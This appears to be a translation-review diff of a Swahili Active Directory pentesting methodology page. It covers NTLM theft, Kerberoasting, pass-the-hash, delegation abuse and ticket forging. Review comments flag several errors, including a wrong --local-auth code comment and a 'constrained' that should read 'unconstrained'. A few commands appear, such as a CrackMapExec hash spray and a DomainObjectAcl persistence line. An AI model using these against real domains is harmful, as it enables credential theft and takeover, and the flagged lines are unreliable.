Ikiwa umeweza kuorodhesha Active Directory utakuwa na barua pepe zaidi na uelewa bora wa network. Unaweza kulazimisha NTLM [**relay attacks**](../../generic-methodologies-and-resources/pentesting-network/spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md#relay-attack) ili kupata ufikiaji wa mazingira ya AD.
Ikiwa umefanikiwa kuorodhesha Active Directory utakuwa na barua pepe zaidi na uelewa bora wa mtandao. Unaweza kujaribu kulazimisha NTLM [**relay attacks**](../../generic-methodologies-and-resources/pentesting-network/spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md#relay-attack) ili kupata ufikiaji wa mazingira ya AD.

### Steal NTLM Creds

Ikiwa unaweza **kupata ufikiaji wa PC au shares nyingine** kwa kutumia null au guest user unaweza **kuweka files** (kama SCF file) ambazo zikigusiwa zitafanya **NTLM authentication dhidi yako** ili uweze **kuiba** NTLM challenge na kuikata:
Iwapo unaweza **kupata access kwenye PC nyingine au shares** kwa kutumia **null or guest user** unaweza **kuweka files** (kama SCF file) ambazo mchakato wowote wa kuzipata unaweza **trigger an NTLM authentication against you**, ili uweze **steal** the **NTLM challenge** na kuikwepa/kuicrack:


{{#ref}}
../ntlm/places-to-steal-ntlm-creds.md
{{#endref}}

## Kuorodhesha Active Directory NA credentials/session
## Enumerating Active Directory WITH credentials/session

Kwa awamu hii unahitaji kuwa umeingilia credentials au session ya akaunti halali ya domain. Ikiwa una credentials halali au shell kama mtumiaji wa domain, kumbuka kwamba chaguzi zilizotolewa hapo awali bado zinaweza kutumika kuingilia watumiaji wengine.
Kwa hatua hii unahitaji kuwa umeharibu **credentials au session ya account halali ya domain.** Ikiwa una credentials halali au shell kama domain user, **kumbuka kwamba chaguzi zilizotajwa hapo awali bado ni njia za kumdhuru watumiaji wengine**.

Kabla ya kuanza enumeration iliyothibitishwa unapaswa kujua nini ni Kerberos double hop problem.
Kabla ya kuanza enumeration iliyothibitishwa unapaswa kuelewa tatizo la **Kerberos double hop problem.**


{{#ref}}
kerberos-double-hop-problem.md
{{#endref}}

### Uorodheshaji
### Enumeration

Kuwa umeingilia akaunti ni hatua kubwa ya kuanza kuingilia domain nzima, kwa sababu utaweza kuanza Active Directory Enumeration:
Kuwa umedhulumiwa akaunti ni **hatua kubwa ya kuanza kudhulumu domain nzima**, kwani utakuwa na uwezo wa kuanza **Active Directory Enumeration:**

Kuhusiana na [**ASREPRoast**](asreproast.md) sasa unaweza kupata watumiaji wote wanaoweza kuwa dhaifu, na kuhusu [**Password Spraying**](password-spraying.md) unaweza kupata **orodha ya majina yote ya watumiaji** na kujaribu nywila ya akaunti iliyovamiwa, nywila tupu na nywila mpya zenye matumaini.
Kuhusu [**ASREPRoast**](asreproast.md) sasa unaweza kupata kila mtumiaji anayehisiwa kuwa hatarini, na kuhusu [**Password Spraying**](password-spraying.md) unaweza kupata **orodha ya majina yote ya watumiaji** na kujaribu nywila za akaunti iliyodhulumiwa, nywila tupu na nywila mpya zinazotarajiwa.

- Unaweza kutumia [**CMD to perform a basic recon**](../basic-cmd-for-pentesters.md#domain-info)
- Unaweza pia kutumia [**powershell for recon**](../basic-powershell-for-pentesters/index.html) ambayo itakuwa isiyoonekana zaidi
- Pia unaweza [**use powerview**](../basic-powershell-for-pentesters/powerview.md) kupata taarifa za kina zaidi
- Zana nyingine nzuri ya recon katika Active Directory ni [**BloodHound**](bloodhound.md). Si **siri sana** (kutegemea mbinu za ukusanyaji unazotumia), lakini **ikiwa haujali** kuhusu hilo, inafaa kujaribu kabisa. Tafuta wapi watumiaji wanaweza RDP, pata njia za vikundi vingine, n.k.
- **Zana nyingine za otomatiki za uorodheshaji wa AD ni:** [**AD Explorer**](bloodhound.md#ad-explorer)**,** [**ADRecon**](bloodhound.md#adrecon)**,** [**Group3r**](bloodhound.md#group3r)**,** [**PingCastle**](bloodhound.md#pingcastle)**.**
- Pia unaweza kutumia [**powershell for recon**](../basic-powershell-for-pentesters/index.html) ambayo itakuwa ya kimya zaidi
- Pia unaweza [**use powerview**](../basic-powershell-for-pentesters/powerview.md) kukusanya taarifa za kina zaidi
- Zana nyingine nzuri kwa recon katika Active Directory ni [**BloodHound**](bloodhound.md). Si **stealthy sana** (kulingana na mbinu za ukusanyaji unazotumia), lakini **ikiwa haujali** kuhusu hilo, inastahili kujaribiwa. Tafuta wapi watumiaji wanaweza RDP, tafuta njia za kuingia kwenye makundi mengine, n.k.
- **Zana nyingine za kiotomatiki za AD enumeration ni:** [**AD Explorer**](bloodhound.md#ad-explorer)**,** [**ADRecon**](bloodhound.md#adrecon)**,** [**Group3r**](bloodhound.md#group3r)**,** [**PingCastle**](bloodhound.md#pingcastle)**.**
- [**DNS records of the AD**](ad-dns-records.md) kwani zinaweza kuwa na taarifa za kuvutia.
- Zana yenye GUI ambayo unaweza kutumia kuorodhesha directory ni **AdExplorer.exe** kutoka kwa **SysInternal** Suite.
- Pia unaweza kutafuta kwenye database ya LDAP kwa kutumia **ldapsearch** kutafuta credentials katika fields _userPassword_ & _unixUserPassword_, au hata kwa _Description_. cf. [Password in AD User comment on PayloadsAllTheThings](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Active%20Directory%20Attack.md#password-in-ad-user-comment) kwa mbinu nyingine.
- Ikiwa unatumia **Linux**, unaweza pia kuorodhesha domain kwa kutumia [**pywerview**](https://github.com/the-useless-one/pywerview).
- Unaweza pia kujaribu zana za otomatiki kama:
- Zana yenye GUI unaweza kutumia kuorodhesha directory ni **AdExplorer.exe** kutoka kwa **SysInternal** Suite.
- Pia unaweza kutafuta kwenye database ya LDAP kwa kutumia **ldapsearch** kutafuta credentials katika fields _userPassword_ & _unixUserPassword_, au hata katika _Description_. cf. [Password in AD User comment on PayloadsAllTheThings](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Active%20Directory%20Attack.md#password-in-ad-user-comment) kwa mbinu nyingine.
- Ikiwa unatumia **Linux**, unaweza pia kuorodhesha domain ukitumia [**pywerview**](https://github.com/the-useless-one/pywerview).
- Pia unaweza kujaribu zana za kiotomatiki kama:
- [**tomcarver16/ADSearch**](https://github.com/tomcarver16/ADSearch)
- [**61106960/adPEAS**](https://github.com/61106960/adPEAS)
- **Kuvua watumiaji wote wa domain**
- **Extracting all domain users**

Ni rahisi sana kupata majina yote ya watumiaji wa domain kutoka Windows (`net user /domain` ,`Get-DomainUser` or `wmic useraccount get name,sid`). Katika Linux, unaweza kutumia: `GetADUsers.py -all -dc-ip 10.10.10.110 domain.com/username` au `enum4linux -a -u "user" -p "password" <DC IP>`
Ni rahisi sana kupata majina yote ya watumiaji wa domain kutoka Windows (`net user /domain` ,`Get-DomainUser` au `wmic useraccount get name,sid`). Katika Linux, unaweza kutumia: `GetADUsers.py -all -dc-ip 10.10.10.110 domain.com/username` au `enum4linux -a -u "user" -p "password" <DC IP>`

> Hata kama sehemu hii ya Enumeration inaonekana ndogo hii ndilo sehemu muhimu zaidi ya yote. Fikia viungo (hasa ile ya cmd, powershell, powerview na BloodHound), jifunze jinsi ya kuorodhesha domain na fanya mazoezi hadi ujisikie uko tayari. Wakati wa assessment, hili litakuwa wakati muhimu wa kupata njia yako kuelekea DA au kuamua kwamba hakuna kinachoweza kufanywa.
> Hata kama sehemu ya Enumeration inaonekana fupi hii ndiyo sehemu muhimu zaidi ya yote. Fungua viungo (hasa ile za cmd, powershell, powerview na BloodHound), jifunze jinsi ya kuorodhesha domain na fanya mazoezi hadi ujiamini. Wakati wa assessment, hili ndilo kipindi muhimu kupata njia yako ya DA au kuamua kuwa hakuna cha kufanya.

### Kerberoast

Kerberoasting inahusisha kupata **TGS tickets** zinazotumiwa na services zinazohusishwa na akaunti za watumiaji na kuvunja usimbaji wake—ambao unategemea nywila za watumiaji—**offline**.
Kerberoasting inahusisha kupata **TGS tickets** zinazotumika na services zinazohusishwa na akaunti za watumiaji na ku-crack usimbaji wake—ambao unategemea nywila za watumiaji—**offline**.

Taarifa zaidi hapa:
Zaidi kuhusu hili katika:


{{#ref}}
kerberoast.md
{{#endref}}

### Muunganisho wa mbali (RDP, SSH, FTP, Win-RM, etc)
### Remote connexion (RDP, SSH, FTP, Win-RM, etc)

Mara utaempata credentials fulani unaweza kuangalia kama una ufikiaji wa mashine yoyote. Kwa kufanya hivyo, unaweza kutumia CrackMapExec kujaribu kujiunga kwenye server nyingi kwa protokoli tofauti, kulingana na port scan zako.
Mara tu unapopata baadhi ya credentials unaweza kuangalia kama una ufikiaji wa yoyote ya **machines**. Kwa hiyo, unaweza kutumia **CrackMapExec** kujaribu kuunganishwa kwenye seva kadhaa kwa protokoli tofauti, kulingana na skani zako za ports.

### Local Privilege Escalation

Ikiwa umeingilia credentials au session kama mtumiaji wa kawaida wa domain na una **ufikiaji** kwa mtumiaji huyu kwenye mashine yoyote katika domain inapaswa kujaribu kupata njia ya kuinua privileges kwa ndani na kuchimba kwa credentials. Hii ni kwa sababu ni kwa privileges za local administrator tu utakapoweza **dump hashes** za watumiaji wengine katika memory (LSASS) na kwa ndani (SAM).
Ikiwa umeharibu credentials au session kama domain user wa kawaida na una **access** kwa mtumiaji huyu kwenye **machine yoyote kwenye domain** unapaswa kujaribu kupata njia ya **escalate privileges locally and looting for credentials**. Hii ni kwa sababu ni kwa tu ukiwa na local administrator privileges ndipo utaweza **dump hashes of other users** kwenye memory (LSASS) na ndani ya mfumo (SAM).

Kuna ukurasa kamili katika kitabu hiki kuhusu [**local privilege escalation in Windows**](../windows-local-privilege-escalation/index.html) na [**checklist**](../checklist-windows-privilege-escalation.md). Pia, usisahau kutumia [**WinPEAS**](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite).

### Current Session Tickets

Ni **nadra sana** utapata **tickets** kwenye mtumiaji wa sasa zitakazokuongezea ruhusa ya kupata rasilimali usizotarajia, lakini unaweza kuangalia:
Ni **sio rahisi** sana kwamba utapata **tickets** kwenye mtumiaji wa sasa ambazo zinakupa ruhusa ya kufikia rasilimali zisizotarajiwa, lakini unaweza kuangalia:
```bash
## List all tickets (if not admin, only current user tickets)
.\Rubeus.exe triage
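Review bot: "compromise" is translated three different ways in this hunk's new lines and two of them change the sense: "umeharibu credentials" (in the "Kwa hatua hii" paragraph and again under Local Privilege Escalation) means "you have damaged", and "Kuwa umedhulumiwa akaunti" under Enumeration means "having been wronged"; the replaced lines' "umeingilia" carries the intended meaning, so use it (or "umeteka") consistently. The new Steal NTLM Creds sentence ends in "kuikwepa/kuicrack", where "kuikwepa" (evade) does not fit "crack"; "kuivunja" is the usual term. "Ni **sio rahisi** sana" under Current Session Tickets should be "Si rahisi sana".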
@ -217,17 +217,17 @@ Ni **nadra sana** utapata **tickets** kwenye mtumiaji wa sasa zitakazokuongezea
```
### NTLM Relay

Ikiwa umefanikiwa kuorodhesha Active Directory utakuwa na **barua pepe zaidi na uelewa bora wa mtandao**. Huenda ukaweza kulazimisha NTLM [**relay attacks**](../../generic-methodologies-and-resources/pentesting-network/spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md#relay-attack)**.**
Ikiwa umefanikiwa kuorodhesha active directory utaweza kuwa na **barua pepe zaidi na uelewa bora wa mtandao**. Unaweza kuweza kulazimisha NTLM [**relay attacks**](../../generic-methodologies-and-resources/pentesting-network/spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md#relay-attack)**.**

### Looks for Creds in Computer Shares | SMB Shares

Sasa kwa kuwa una baadhi ya credentials za msingi unapaswa kuangalia kama unaweza **kupata** faili zozote **zinazovutia zinazoshirikiwa ndani ya AD**. Unaweza kufanya hivyo kwa mkono lakini ni kazi ya kuchosha na kurudia (na zaidi endapo utakuta mamia ya nyaraka unazopaswa kukagua).
Sasa kwa kuwa una baadhi ya basic credentials unapaswa kuangalia kama unaweza **kupata** faili zozote **zinazovutia zinazoshirikiwa ndani ya AD**. Unaweza kufanya hivyo kwa mikono lakini ni kazi ya kuchosha sana ya kurudia-rudia (hasa ikiwa utakuta mamia ya nyaraka unazohitaji kukagua).

[**Follow this link to learn about tools you could use.**](../../network-services-pentesting/pentesting-smb/index.html#domain-shared-folders-search)
[**Fuata kiungo hiki ili ujifunze kuhusu zana unazoweza kutumia.**](../../network-services-pentesting/pentesting-smb/index.html#domain-shared-folders-search)

### Steal NTLM Creds

Ikiwa unaweza **kupata PC au shares nyingine** unaweza **kuweka faili** (k.m. SCF file) ambazo zikifunguliwa zita**lazimisha uthibitishaji wa NTLM dhidi yako** ili uweze **kuiba** **NTLM challenge** na kuijaribu kuvunja:
Ikiwa unaweza **access other PCs or shares** unaweza **kuweka faili** (kama faili ya SCF) ambazo zikigundulika kwa namna yoyote zita**sababisha uthibitisho wa NTLM dhidi yako** ili uweze **kuiba** **NTLM challenge** ili kuichakua:


{{#ref}}
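Review bot: the new Steal NTLM Creds line ends "ili kuichakua", which is not a Swahili word; the intended sense is "ili kuivunja" (to crack it), as in the replaced line's "kuijaribu kuvunja". The same line leaves "access other PCs or shares" untranslated inside the bold where the replaced line had "kupata PC au shares nyingine". The heading "### Looks for Creds in Computer Shares | SMB Shares" is unchanged context here but is still untranslated.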
@ -236,7 +236,7 @@ Ikiwa unaweza **kupata PC au shares nyingine** unaweza **kuweka faili** (k.m. SC

### CVE-2021-1675/CVE-2021-34527 PrintNightmare

Udhaifu huu ulimruhusu mtumiaji yeyote aliyethibitishwa **kudhoofisha domain controller**.
Hitilafu hii iliruhusu mtumiaji yeyote aliyethibitishwa **kuvamia domain controller**.


{{#ref}}
|
||||
@ -245,23 +245,23 @@ printnightmare.md

## Privilege escalation on Active Directory WITH privileged credentials/session

**For the following techniques a regular domain user is not enough, you need some special privileges/credentials to perform these attacks.**
**Kwa mbinu zifuatazo mtumiaji wa kawaida wa domain haitoshi, unahitaji baadhi ya privileges/credentials maalum ili kutekeleza mashambulizi haya.**

### Hash extraction

Kwa bahati nzuri umeweza **kupata udhibiti wa akaunti ya local admin** kwa kutumia [AsRepRoast](asreproast.md), [Password Spraying](password-spraying.md), [Kerberoast](kerberoast.md), [Responder](../../generic-methodologies-and-resources/pentesting-network/spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md) ikiwemo relaying, [EvilSSDP](../../generic-methodologies-and-resources/pentesting-network/spoofing-ssdp-and-upnp-devices.md), [escalating privileges locally](../windows-local-privilege-escalation/index.html).\
Kisha, ni wakati wa kutupa hashes zote zilizo kwenye memory na ndani ya mashine.\
[**Read this page about different ways to obtain the hashes.**](https://github.com/carlospolop/hacktricks/blob/master/windows-hardening/active-directory-methodology/broken-reference/README.md)
Tunatumai umefanikiwa **kupata udhibiti wa account ya local admin** kwa kutumia [AsRepRoast](asreproast.md), [Password Spraying](password-spraying.md), [Kerberoast](kerberoast.md), [Responder](../../generic-methodologies-and-resources/pentesting-network/spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md) including relaying, [EvilSSDP](../../generic-methodologies-and-resources/pentesting-network/spoofing-ssdp-and-upnp-devices.md), [escalating privileges locally](../windows-local-privilege-escalation/index.html).\
Kisha, ni wakati wa kutoa hashes zote kutoka kwenye memory na kwa ndani.\
[**Soma ukurasa huu kuhusu njia tofauti za kupata hashes.**](https://github.com/carlospolop/hacktricks/blob/master/windows-hardening/active-directory-methodology/broken-reference/README.md)

### Pass the Hash

**Mara utakapokuwa na hash ya mtumiaji**, unaweza kuitumia kumfanyia **impersonate**.\
Unahitaji kutumia zana itakayofanya **uthibitishaji wa NTLM ukitumia** hash hiyo, **au** unaweza kuunda sessionlogon mpya na **kuingiza** hash hiyo ndani ya LSASS, ili wakati wowote **uthibitishaji wa NTLM unafanyika**, hash hiyo itatumika. Chaguo la mwisho ndiyo mimikatz inafanya.\
[**Read this page for more information.**](../ntlm/index.html#pass-the-hash)
**Mara tu unapokuwa na hash ya mtumiaji**, unaweza kuitumia **impersonate** it.\
Unahitaji kutumia **tool** itakayefanya **NTLM authentication ikitumia** hiyo **hash**, **au** unaweza kuunda **sessionlogon** mpya na **inject** hiyo **hash** ndani ya **LSASS**, ili wakati wowote **NTLM authentication** itakapotendeka, hiyo **hash itatumika.** Chaguo la mwisho ndilo linalofanywa na mimikatz.\
[**Soma ukurasa huu kwa maelezo zaidi.**](../ntlm/index.html#pass-the-hash)

### Over Pass the Hash/Pass the Key

Shambulio hili linalenga **kutumia hash ya NTLM ya mtumiaji kuomba tiketi za Kerberos**, kama mbadala wa kawaida Pass The Hash juu ya protocol ya NTLM. Kwa hivyo, hili linaweza kuwa hasa **lenye matumizi kwenye mitandao ambapo protocol ya NTLM imezimwa** na **Kerberos pekee ndiyo inaruhusiwa** kama protocol ya uthibitishaji.
Shambulio hili linalenga **kutumia NTLM hash ya mtumiaji kuomba Kerberos tickets**, kama mbadala kwa Pass The Hash kawaida juu ya protocol ya NTLM. Hivyo, hii inaweza kuwa hasa **faa katika mitandao ambapo NTLM protocol imezimwa** na tu **Kerberos inaruhusiwa** kama protocol ya uthibitisho.


{{#ref}}
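Review bot: the "Read this page about different ways to obtain the hashes" link under Hash extraction still points at .../broken-reference/README.md in both the old and the new line, so the commit fixes the anchor text but leaves a dead target; either point it at the page that actually lists the dumping techniques or drop the link. In the Pass the Hash paragraph the new line keeps a bare English fragment, "unaweza kuitumia **impersonate** it" (no Swahili infinitive, stray "it"), and "sessionlogon" should read "logon session".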
@ -270,7 +270,7 @@ over-pass-the-hash-pass-the-key.md

### Pass the Ticket

Katika njia ya shambulio ya **Pass The Ticket (PTT)**, wadukuzi **huiba tiketi ya uthibitishaji ya mtumiaji** badala ya nywila au thamani za hash. Tiketi hii iliyoporwa kisha inatumika **kuiga mtumiaji**, kupata ufikiaji usioidhinishwa kwa rasilimali na huduma ndani ya mtandao.
Katika mbinu ya shambulio ya **Pass The Ticket (PTT)**, wavamizi **huiba tiketi ya uthibitisho ya mtumiaji** badala ya nenosiri au thamani za hash. Tiketi hii iliyochukuliwa kisha inatumika **impersonate** mtumiaji, kupata ufikiaji usioidhinishwa kwa rasilimali na huduma ndani ya mtandao.


{{#ref}}
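Review bot: in the Pass The Ticket sentence the new line uses "inatumika **impersonate** mtumiaji" with no infinitive marker, so the English verb dangles; the old line's "kuiga mtumiaji" (or "ku-impersonate mtumiaji") reads as Swahili and should be kept.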
@ -279,19 +279,19 @@ pass-the-ticket.md

### Credentials Reuse

Ikiwa una **hash** au **password** ya **local administrator** unapaswa kujaribu **kuingia locally** kwenye **PC nyingine** ukitumia hiyo.
Ikiwa una **hash** au **password** ya **local administrator** unapaswa kujaribu **login locally** kwenye **PCs** nyingine ukitumia hiyo.
```bash
# Local Auth Spray (once you found some local admin pass or hash)
## --local-auth flag indicate to only try 1 time per machine
crackmapexec smb --local-auth 10.10.10.10/23 -u administrator -H 10298e182387f9cab376ecd08491764a0 | grep +
```
> [!WARNING]
> Kumbuka kwamba hii inasababisha **kelele nyingi** na **LAPS** ingepunguza hilo.
> Kumbuka kwamba hili ni **kelele** sana na **LAPS** lingepunguza hilo.

### MSSQL Abuse & Trusted Links

Iwapo mtumiaji ana ruhusa za **access MSSQL instances**, anaweza kuitumia kuweza **execute commands** kwenye mwenyeji wa MSSQL (ikiwa inaendesha kama SA), **steal** NetNTLM **hash** au hata kufanya **relay attack**.\
Pia, ikiwa MSSQL instance imewekwa kama trusted (database link) na instance tofauti ya MSSQL. Ikiwa mtumiaji ana ruhusa kwenye database iliyotumika, atakuwa na uwezo wa **use the trust relationship to execute queries also in the other instance**. Imani hizi zinaweza kuunganishwa mnyororo na kwa wakati fulani mtumiaji anaweza kupata database iliyopangwa vibaya ambako anaweza kuexecute commands.\
Ikiwa mtumiaji ana vibali vya **access MSSQL instances**, anaweza kutumia hilo kwa **execute commands** kwenye mwenyeji wa MSSQL (ikiwa inaendesha kama SA), **steal** NetNTLM **hash** au hata kufanya **relay** **attack**.\
Pia, ikiwa instance ya MSSQL inaaminika (database link) na instance tofauti ya MSSQL. Ikiwa mtumiaji ana vibali kwenye database iliyotumika kama trusted, atakuwa na uwezo wa **use the trust relationship to execute queries also in the other instance**. Hii trust zinaweza kuunganishwa mnyororo na katika hatua fulani mtumiaji anaweza kupata database iliyopangwa vibaya ambapo anaweza **execute commands**.\
**The links between databases work even across forest trusts.**


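Review bot: the code comment "--local-auth flag indicate to only try 1 time per machine" misdescribes the flag; in CrackMapExec --local-auth means authenticate against each target with a local (SAM) account instead of a domain account, which is exactly why it is used to spray a local administrator hash, and it says nothing about the number of attempts. The line is untouched by this commit but sits in the hunk, so fix the comment here (e.g. "--local-auth: authenticate with a local account, not a domain one"). In the MSSQL paragraph the new line's "Hii trust zinaweza kuunganishwa" mixes singular and plural; "Trusts hizi zinaweza kuunganishwa" matches the rest of the sentence.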
@ -301,7 +301,7 @@ abusing-ad-mssql.md

### IT asset/deployment platforms abuse

Suite za upande wa tatu za inventory na deployment mara nyingi zinaonyesha njia zenye nguvu kuelekea credentials na code execution. Angalia:
Suite za upande wa tatu za inventory na deployment mara nyingi zinaonyesha njia zenye nguvu za kupata credentials na code execution. Angalia:

{{#ref}}
sccm-management-point-relay-sql-policy-secrets.md
@ -313,9 +313,9 @@ lansweeper-security.md

### Unconstrained Delegation

Ikiwa utakuta Computer object yoyote yenye attribute [ADS_UF_TRUSTED_FOR_DELEGATION](<https://msdn.microsoft.com/en-us/library/aa772300(v=vs.85).aspx>) na una domain privileges kwenye kompyuta hiyo, utaweza dump TGTs kutoka kwenye memory ya watumiaji wote wanao login kwenye kompyuta.\
Hivyo, ikiwa **Domain Admin logins onto the computer**, utaweza dump TGT yake na kuimpersonate kwa kutumia [Pass the Ticket](pass-the-ticket.md).\
Shukrani kwa constrained delegation unaweza hata **automatically compromise a Print Server** (kwa bahati nzuri itakuwa DC).
Ikiwa unakuta Computer object yenye attribute [ADS_UF_TRUSTED_FOR_DELEGATION](<https://msdn.microsoft.com/en-us/library/aa772300(v=vs.85).aspx>) na una domain privileges kwenye kompyuta hiyo, utaweza dump TGTs kutoka memory ya watumiaji wote wanaoingia kwenye kompyuta hiyo.\
Kwa hiyo, ikiwa **Domain Admin** anaingia kwenye kompyuta, utaweza dump TGT yake na kumfanyia impersonate kwa kutumia [Pass the Ticket](pass-the-ticket.md).\
Shukrani kwa constrained delegation unaweza hata **automatically compromise a Print Server** (atumaini itakuwa DC).


{{#ref}}
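Review bot: the last sentence of the Unconstrained Delegation paragraph says "Shukrani kwa constrained delegation unaweza hata automatically compromise a Print Server", but the section heading and the preceding sentences (a computer with ADS_UF_TRUSTED_FOR_DELEGATION, dumping the TGTs of everyone who logs on) are about unconstrained delegation; "constrained" contradicts them and should be "unconstrained delegation" in the new line rather than carried over from the old one. The new line also has the typo "atumaini" for "tunatumaini".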
@ -324,8 +324,9 @@ unconstrained-delegation.md

### Constrained Delegation

Ikiwa user au computer imekubaliwa kwa "Constrained Delegation" itakuwa na uwezo wa **impersonate any user to access some services in a computer**.\
Kisha, ikiwa utakapofanya **compromise the hash** ya user/computer hii utaweza **impersonate any user** (hata domain admins) kupata huduma fulani.
Ikiwa mtumiaji au kompyuta imeruhusiwa kwa "Constrained Delegation" itakuwa na uwezo wa **impersonate any user to access some services in a computer**.\
Kisha, ikiwa wewe **compromise the hash** ya mtumiaji/kompyuta hii utaweza **impersonate any user** (hata domain admins) kuingia kwenye baadhi ya services.


{{#ref}}
constrained-delegation.md
@ -333,7 +334,7 @@ constrained-delegation.md

### Resourced-based Constrain Delegation

Kuwa na ruhusa ya **WRITE** juu ya Active Directory object ya remote computer kunawawezesha kupata code execution kwa **elevated privileges**:
Kuwa na ruhusa ya **WRITE** kwenye Active Directory object ya kompyuta ya mbali kunaruhusu kupata code execution kwa **elevated privileges**:


{{#ref}}
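Review bot: the heading "### Resourced-based Constrain Delegation" in this hunk's context is misspelled; it should be "Resource-based Constrained Delegation", matching the linked resource-based-constrained-delegation.md and the term used in the paragraph below it.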
@ -342,7 +343,7 @@ resource-based-constrained-delegation.md

### Permissions/ACLs Abuse

Mtumiaji aliyepatwa anaweza kuwa na baadhi ya **interesting privileges over some domain objects** ambazo zinaweza kuruhusu wewe **move** laterally/**escalate** privileges.
Mtumiaji aliyeverengwa anaweza kuwa na baadhi ya **interesting privileges over some domain objects** ambayo yanaweza kumruhusu **move** lateral/**escalate** privileges baadaye.


{{#ref}}
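Review bot: "Mtumiaji aliyeverengwa" in the new ACLs Abuse line is not a Swahili word; the old line's "aliyepatwa" or, closer to "compromised", "aliyeathiriwa" should be used. The new line also turns "move laterally" into "move lateral", losing the adverb.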
@ -351,7 +352,7 @@ acl-persistence-abuse/

### Printer Spooler service abuse

Kugundua **Spool service listening** ndani ya domain kunaweza kutumika **abused** ili **acquire new credentials** na **escalate privileges**.
Kupata **Spool service listening** ndani ya domain kunaweza **abused** ili **acquire new credentials** na **escalate privileges**.


{{#ref}}
@ -360,8 +361,8 @@ printers-spooler-service-abuse.md

### Third party sessions abuse

Ikiwa **other users** **access** the **compromised** machine, inawezekana **gather credentials from memory** na hata **inject beacons in their processes** ili kuimpersonate.\
Kwa kawaida watumiaji watafikia mfumo kupitia RDP, kwa hiyo hapa kuna jinsi ya kufanya baadhi ya attacks juu ya third party RDP sessions:
Ikiwa **other users** wana **access** kwenye **compromised** machine, inawezekana **gather credentials from memory** na hata **inject beacons in their processes** ili kuwao impersonate.\
Kawaida watumiaji wataingia mfumo kupitia RDP, hivyo hapa kuna jinsi ya kufanya baadhi ya mashambulizi juu ya sesi za RDP za watu wengine:


{{#ref}}
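Review bot: "ili kuwao impersonate" in the new Third party sessions line is ungrammatical; "ili kuwaiga" (or "ili ku-impersonate") keeps the meaning without the stray object pronoun.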
@ -370,7 +371,7 @@ rdp-sessions-abuse.md

### LAPS

**LAPS** inatoa mfumo wa kusimamia **local Administrator password** kwenye kompyuta zinazounganishwa na domain, kuhakikisha kuwa imekuwa **randomized**, ya kipekee, na mara kwa mara **changed**. Password hizi zimehifadhiwa ndani ya Active Directory na ufikiaji unadhibitiwa kupitia ACLs kwa watumiaji walioruhusiwa pekee. Ukiwa na permissions za kutosha za kuaccess password hizi, pivoting kwenda kwenye kompyuta nyingine kunawezekana.
**LAPS** hutoa mfumo wa kusimamia **local Administrator password** kwenye kompyuta zilizo joined kwenye domain, kuhakikisha ni **randomized**, ya kipekee, na hubadilishwa mara kwa mara. Nywila hizi zinahifadhiwa ndani ya Active Directory na ufikiaji zinafungiwa kupitia ACLs kwa watumiaji walioidhinishwa tu. Ukiwa na vibali vya kutosha vya kusoma nywila hizi, pivoting kwenda kompyuta nyingine inakuwa inawezekana.


{{#ref}}
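Review bot: "ufikiaji zinafungiwa kupitia ACLs" in the new LAPS line has a noun-class mismatch and "zinafungiwa" (are locked) says more than the source; the old line's "ufikiaji unadhibitiwa kupitia ACLs kwa watumiaji walioruhusiwa pekee" is the accurate rendering of access being restricted by ACL.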
@ -379,7 +380,7 @@ laps.md

### Certificate Theft

Kukusanya **certificates** kutoka kwa mashine iliyoporwa kunaweza kuwa njia ya kuescalate privileges ndani ya mazingira:
**Gathering certificates** kutoka kwenye mashine iliyoverengwa inaweza kuwa njia ya ku-escalate privileges ndani ya mazingira:


{{#ref}}
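Review bot: "mashine iliyoverengwa" repeats the non-word already flagged in the ACLs Abuse hunk; use "iliyoathiriwa" (compromised). The old line's "Kukusanya **certificates**" also read better than leaving "Gathering certificates" untranslated as the subject.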
@ -388,7 +389,7 @@ ad-certificates/certificate-theft.md

### Certificate Templates Abuse

Ikiwa **vulnerable templates** zimesanidiwa inawezekana kuzitumia kwa **abuse** ili kuescalate privileges:
Ikiwa **vulnerable templates** zimewekwa inaweza kuzitumia ku-escalate privileges:


{{#ref}}
@ -399,7 +400,7 @@ ad-certificates/domain-escalation.md

### Dumping Domain Credentials

Mara tu unapopata **Domain Admin** au bora zaidi **Enterprise Admin** privileges, unaweza **dump** **domain database**: _ntds.dit_.
Mara baada ya kupata **Domain Admin** au bora zaidi **Enterprise Admin** privileges, unaweza **dump** **domain database**: _ntds.dit_.

[**More information about DCSync attack can be found here**](dcsync.md).

@ -407,7 +408,7 @@ Mara tu unapopata **Domain Admin** au bora zaidi **Enterprise Admin** privileges

### Privesc as Persistence

Baadhi ya techniques zilizojadiliwa hapo awali zinaweza kutumika kwa persistence.\
Baadhi ya mbinu zilizojadiliwa hapo juu zinaweza kutumika kwa persistence.\
Kwa mfano unaweza:

- Make users vulnerable to [**Kerberoast**](kerberoast.md)
@ -430,7 +431,7 @@ Add-DomainObjectAcl -TargetIdentity "DC=SUB,DC=DOMAIN,DC=LOCAL" -PrincipalIdenti

### Silver Ticket

The **Silver Ticket attack** inaunda legitimate Ticket Granting Service (TGS) ticket kwa huduma maalum kwa kutumia **NTLM hash** (kwa mfano, **hash ya PC account**). Mbinu hii inatumiwa kupata service privileges.
Shambulio la **Silver Ticket** linaunda **legitimate Ticket Granting Service (TGS) ticket** kwa huduma maalum kwa kutumia **NTLM hash** (kwa mfano, **hash ya PC account**). Njia hii inatumika kupata **access the service privileges**.


{{#ref}}
@ -439,9 +440,9 @@ silver-ticket.md

### Golden Ticket

A **Golden Ticket attack** inahusisha mshambuliaji kupata **NTLM hash ya krbtgt account** ndani ya Active Directory (AD). Akaunti hii ni maalum kwa sababu inatumiwa kusaini lahat TGTs (Ticket Granting Tickets), ambazo ni muhimu kwa uthibitisho ndani ya mtandao wa AD.
Shambulio la **Golden Ticket** linahusisha mdukuzi kupata **NTLM hash ya krbtgt account** katika mazingira ya Active Directory (AD). Akaunti hii ni maalum kwa sababu inatumika kusaini zote **Ticket Granting Tickets (TGTs)**, ambazo ni muhimu kwa authentication ndani ya mtandao wa AD.

